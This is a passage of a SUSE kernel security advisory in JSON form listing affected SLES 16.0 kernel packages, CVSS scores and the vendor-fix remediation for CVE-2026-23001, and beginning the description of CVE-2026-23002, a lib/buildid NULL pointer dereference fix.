"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23001",
"url": "https://www.suse.com/security/cve/CVE-2026-23001"
},
{
"category": "external",
"summary": "SUSE Bug 1257232 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "external",
"summary": "SUSE Bug 1257233 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2026-23001"
},
{
"cve": "CVE-2026-23002",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23002"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlib/buildid: use __kernel_read() for sleepable context\n\nPrevent a \"BUG: unable to handle kernel NULL pointer dereference in\nfilemap_read_folio\".\n\nFor the sleepable context, convert freader to use __kernel_read() instead\nof direct page cache access via read_cache_folio(). This simplifies the\nfaultable code path by using the standard kernel file reading interface\nwhich handles all the complexity of reading file data.\n\nAt the moment we are not changing the code for non-sleepable context which\nuses filemap_get_folio() and only succeeds if the target folios are\nalready in memory and up-to-date. The reason is to keep the patch simple\nand easier to backport to stable kernels.\n\nSyzbot repro does not crash the kernel anymore and the selftests run\nsuccessfully.\n\nIn the follow up we will make __kernel_read() with IOCB_NOWAIT work for\nnon-sleepable contexts. In addition, I would like to replace the\nsecretmem check with a more generic approach and will add 